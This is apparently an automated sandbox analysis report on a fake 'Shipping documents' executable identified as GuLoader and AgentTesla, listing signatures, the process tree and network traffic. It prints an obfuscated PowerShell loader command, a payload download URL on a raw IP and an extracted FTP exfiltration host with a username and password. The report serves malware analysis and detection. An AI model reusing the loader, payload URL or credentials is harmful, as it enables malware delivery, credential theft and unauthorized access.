Edit tour

Windows Analysis Report
Shipping documents 000309498585956000797900.exe

Overview

General Information

Sample name:	Shipping documents 000309498585956000797900.exe
Analysis ID:	1520706
MD5:	94c700b33fb2a1aa2bd02f13750cca75
SHA1:	abe3abd4f60778dfa694a8fc54b9d1037a248132
SHA256:	9f40759902174555ab1294eb92ae2d17ad2698d2e0e68694edbb9684bdab7692
Tags:	exeSPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Yara detected AgentTesla

Yara detected GuLoader

AI detected suspicious sample

Found suspicious powershell code related to unpacking or dynamic code loading

Initial sample is a PE file and has a suspicious name

Powershell drops PE file

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Abnormal high CPU Usage

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found evaded block containing many API calls

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

Shipping documents 000309498585956000797900.exe (PID: 764 cmdline: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe" MD5: 94C700B33FB2A1AA2BD02F13750CCA75)

powershell.exe (PID: 6396 cmdline: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 3876 cmdline: "C:\Windows\syswow64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://0xmrmagnezi.github.io/malware%20analysis/AgentTesla/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.3309605845.0000000024C31000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.2916363321.000000000C87B000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 3876	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 3876	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 84.38.133.140, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3876, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49714

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6396, TargetFilename: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , CommandLine: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe", ParentImage: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe, ParentProcessId: 764, ParentProcessName: Shipping documents 000309498585956000797900.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)" , ProcessId: 6396, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-09-27T18:34:24.433199+0200	2803270	2	Potentially Bad Traffic	192.168.2.5	49714	84.38.133.140	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Shipping documents 000309498585956000797900.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

Avira: detection malicious, Label: HEUR/AGEN.1357304

Found malware configuration

Source: powershell.exe.6396.1.memstrmin

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.concaribe.com", "Username": "testi@concaribe.com", "Password": "ro}UWgz#!38E"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

ReversingLabs: Detection: 21%

Multi AV Scanner detection for submitted file

Source: Shipping documents 000309498585956000797900.exe

ReversingLabs: Detection: 21%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.4% probability

Source: Shipping documents 000309498585956000797900.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: Shipping documents 000309498585956000797900.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: tem.Core.pdb source: powershell.exe, 00000001.00000002.2915880878.00000000081B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB[ source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdbB source: powershell.exe, 00000001.00000002.2906379045.00000000029CF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2915999268.00000000081C8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: powershell.exe, 00000001.00000002.2912347917.0000000007007000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_00406719 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00406719
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_004065CF FindFirstFileW,FindClose,	0_2_004065CF
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_00402B75 FindFirstFileW,	0_2_00402B75

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: Joe Sandbox View

ASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49714 -> 84.38.133.140:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 84.38.133.140Cache-Control: no-cache

Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140
Source: unknown	TCP traffic detected without corresponding DNS query: 84.38.133.140

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /MQLoRGjADyYzKXcZrWGSjs213.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 84.38.133.140Cache-Control: no-cache

Source: global traffic	DNS traffic detected: DNS query: api.ipify.org
Source: global traffic	DNS traffic detected: DNS query: ftp.concaribe.com

Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3308837948.0000000024260000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin
Source: msiexec.exe, 00000006.00000002.3291573272.00000000007FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://84.38.133.140/MQLoRGjADyYzKXcZrWGSjs213.bin~
Source: msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://concaribe.com
Source: powershell.exe, 00000001.00000002.2912266214.0000000006ED1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m$
Source: msiexec.exe, 00000006.00000002.3309605845.0000000024C59000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ftp.concaribe.com
Source: Shipping documents 000309498585956000797900.exe, 00000000.00000000.2041425401.0000000000409000.00000002.00000001.01000000.00000003.sdmp, Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069459325.0000000000409000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://nsis.sf.net/NSIS_Error...
Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2907254415.00000000046D1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org
Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/
Source: msiexec.exe, 00000006.00000002.3309605845.0000000024BE1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org/t
Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000001.00000002.2907254415.0000000004826000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000001.00000002.2910152132.000000000573A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715

Source: unknown

HTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Code function: 0_2_00404B30 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00404B30

System Summary

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: Shipping documents 000309498585956000797900.exe

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Shipping documents 000309498585956000797900.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Code function: 0_2_004036FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,

0_2_004036FC

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_0040441E	0_2_0040441E
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_004075FE	0_2_004075FE
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Code function: 0_2_00406EA8	0_2_00406EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0675EBD8	1_2_0675EBD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0675F4A8	1_2_0675F4A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0675E890	1_2_0675E890
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_0675D7AA	1_2_0675D7AA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 1_2_067514F5	1_2_067514F5
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0037E370	6_2_0037E370
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00374A58	6_2_00374A58
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00374188	6_2_00374188
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0037AAB0	6_2_0037AAB0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_0037AAAA	6_2_0037AAAA
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_00373E40	6_2_00373E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2798A7DC	6_2_2798A7DC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_2798BE00	6_2_2798BE00
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A2380	6_2_279A2380
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279AB300	6_2_279AB300
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A7760	6_2_279A7760
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A56A0	6_2_279A56A0
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A7E40	6_2_279A7E40
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A5DC8	6_2_279A5DC8
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279AE468	6_2_279AE468
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279AC240	6_2_279AC240
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A0038	6_2_279A0038
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 6_2_279A0040	6_2_279A0040

Source: Shipping documents 000309498585956000797900.exe

Static PE information: invalid certificate

Source: Shipping documents 000309498585956000797900.exe, 00000000.00000002.2069635936.00000000004BC000.00000002.00000001.01000000.00000003.sdmp

Binary or memory string: OriginalFilenamebjlkevrkets subprofessor.exel& vs Shipping documents 000309498585956000797900.exe

Source: Shipping documents 000309498585956000797900.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/15@2/3

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

0_2_004036FC

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Code function: 0_2_00404085 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,EnableWindow,

0_2_00404085

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Code function: 0_2_0040234F CoCreateInstance,

0_2_0040234F

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

File created: C:\Users\user\AppData\Roaming\chondriosome

Jump to behavior

Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6496:120:WilError_03

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

File created: C:\Users\user\AppData\Local\Temp\nsl1945.tmp

Jump to behavior

Source: Shipping documents 000309498585956000797900.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Process
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\SysWOW64\msiexec.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Shipping documents 000309498585956000797900.exe

ReversingLabs: Detection: 21%

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

File read: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe "C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe"
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$Mahjongg=Get-Content 'C:\Users\user\AppData\Roaming\chondriosome\retskrivningssystemer\Laccolitic51.Suk151';$Chefen128=$Mahjongg.SubString(11975,3);.$Chefen128($Mahjongg)"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Shipping documents 000309498585956000797900.exe	Section loaded: kernel.appcore.dll	Jump to behavior
